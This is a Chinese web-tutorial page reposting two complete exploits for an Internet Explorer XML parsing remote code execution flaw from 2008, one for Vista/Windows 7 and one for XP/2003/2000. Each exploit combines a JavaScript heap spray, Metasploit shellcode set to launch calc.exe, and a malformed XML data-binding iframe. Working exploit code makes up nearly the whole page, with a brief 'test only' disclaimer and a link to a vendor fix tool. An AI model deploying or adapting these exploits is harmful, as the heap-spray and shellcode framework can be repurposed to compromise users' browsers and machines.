DIV CSS 佈局教程網

 DIV+CSS佈局教程網 >> 網頁腳本 >> XML學習教程 >> XML詳解 >> 微軟IE最新XML漏洞利用代碼
微軟IE最新XML漏洞利用代碼
編輯:XML詳解     

 微軟IE最新XML漏洞利用代碼,目前微軟尚未發布修復該漏洞的補丁,大家可利用如下代碼進行測試,但請勿用於攻擊

  適用於Vista操作系統的代碼(Vista/SERVER 2008/Windows 7):

1  1. <Html>
2  2. <script>
3  3. 
4  4.   // k`sOSe 12/10/2008
5  5.   // Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
6  6.   // Heap spray address adjusted for Vista - muts / offensive-security.com
7  7.   // http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
8  8.   // http://www.offensive-security.com/0day/iesploit-vista.rar
9  9.   // Windows/exec - 141 bytes
10 10.   // http://www.metasploit.com                                  
11 11.   // EXITFUNC=seh, CMD=C:Windowssystem32calc.exe  
12 12.   var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
13 13.   var block = unescape("%u0c0c%u0c0c");
14 14.   var nops = unescape("%u9090%u9090%u9090");
15 15. 
16 16. 
17 17.   while (block.length < 81920) block += block;
18 18.   var memory = new Array();
19 19.   var i=0;
20 20.   for (;i<1000;i++) memory[i] += (block + nops + shellcode);
21 21. 
22 22.   document.write("<iframe src="iframe.Html">");
23 23. 
24 24. </script>
25 25. 
26 26. 
27 27. </Html>
28 28. 
29 29. 
30 30. <!-- iframe.Html
31 31. 
32 32. <XML ID=I>
33 33.   <X>
34 34.     <C>
35 35.       <![CDATA[
36 36.         <image
37 37.           SRC=http://ఌఌ.xxxxx.org    
38 38.         >
39 39.       ]]>
40 40.      
41 41.     </C>
42 42.   </X>
43 43. </XML>
44 44. 
45 45. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=Html>
46 46.   <XML ID=I>
47 47.   </XML>
48 48. 
49 49.   <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=Html>
50 50.   </SPAN>
51 51. </SPAN>
52 52. 
53 53. -->
54

適用於Windows舊版本操作系統的代碼(XP/2003/2000等):

1  1. IE-sploit.Html
2  2. <Html>
3  3. <script>
4  4. 
5  5.   // k`sOSe 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.13
6  6. 
7  7.   // Windows/exec - 141 bytes                                  
8  8.   // http://www.metasploit.com                                  
9  9.   // EXITFUNC=seh, CMD=C:Windowssystem32calc.exe  
10 10.   var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
11 11.   var block = unescape("%u0a0a%u0a0a");
12 12.   var nops = unescape("%u9090%u9090%u9090");
13 13. 
14 14. 
15 15.   while (block.length < 81920) block += block;
16 16.   var memory = new Array();
17 17.   var i=0;
18 18.   for (;i<1000;i++) memory[i] += (block + nops + shellcode);
19 19. 
20 20.   document.write("<iframe src="iframe.Html">");
21 21. 
22 22. </script>
23 23. 
24 24. 
25 25. </Html>
26 26. 
27 27. iframe.Html
28 28. <XML ID=I>
29 29.   <X>
30 30.     <C>
31 31.       <![CDATA[
32 32.         <image
33 33.           SRC=http://ਊਊ.xxxxx.org    
34 34.         >
35 35.       ]]>
36 36.      
37 37.     </C>
38 38.   </X>
39 39. </XML>
40 40. 
41 41. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=Html>
42 42.   <XML ID=I>
43 43.   </XML>
44 44.   <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=Html>
45 45.   </SPAN>
46 46. </SPAN>
47

  目前微軟尚未對該漏洞發布相應的補丁,我們如何對該漏洞進行防范呢,360安全衛士推出了一款修復工具可以對該漏洞進行修復,修復工具下載地址為http://dl.360safe.com/360fixmsxml.exe。


XML學習教程| jQuery入門知識| AJAX入門| Dreamweaver教程| Fireworks入門知識| SEO技巧| SEO優化集錦|
Copyright © DIV+CSS佈局教程網 All Rights Reserved